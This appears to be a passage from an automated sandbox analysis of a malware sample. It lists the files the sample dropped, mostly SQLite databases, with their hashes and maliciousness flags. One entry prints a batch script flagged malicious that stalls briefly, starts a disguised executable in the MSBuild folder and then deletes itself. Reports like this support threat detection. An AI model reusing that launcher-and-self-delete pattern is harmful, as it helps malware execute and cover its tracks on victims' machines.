                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):239
                                                                                      Entropy (8bit):5.375769514154598
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:hCijTg3Nou1SV+DER5IHrQc6zSKOZG1wkn23f1CTn:HTg9uYDEfIrQzIfNg
                                                                                      MD5:887E0E3DF7F29498378BB83B93C28C47
                                                                                      SHA1:5FBFC95FA13EAF004D04C16373228A1B6E276B04
                                                                                      SHA-256:261E32A892736F1E83F8F62A685AFD918E3EA55703ED063B370330C190B47AD9
                                                                                      SHA-512:1495BD1ED65DF5F7FB7FD8C3204EB173B3FFA4CAB8921FF068C45E8509D2502605F24ACAA186DC797F4357734171139A6E2DD340C509975A8CB2F223928D3A89
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\msbuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\P9ncPmw0Gs.bat"
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):25
                                                                                      Entropy (8bit):4.323856189774723
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:MhLCR9Dn:gLaDn
                                                                                      MD5:E5DCD576BFF1A7E02CD51D2FF39018B0
                                                                                      SHA1:9B60BD85429CA6178A014E7CC354367913E4271A
                                                                                      SHA-256:6DCF7FE94A96DDDB493F4DB06941FBC56159B84F750DA8263DD77BC6515172C4
                                                                                      SHA-512:5CEE769189B7C3A640C1B598F233FF4424D12387405329F27FF82C34100329C37B687A33A281695AA401BC11CCC236DC3EE3EEA9C2CC9A7B17B10CC423DADCB9
                                                                                      Malicious:false
                                                                                      Preview:FUJGo0DDigrc0qcblNy49oIVB
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
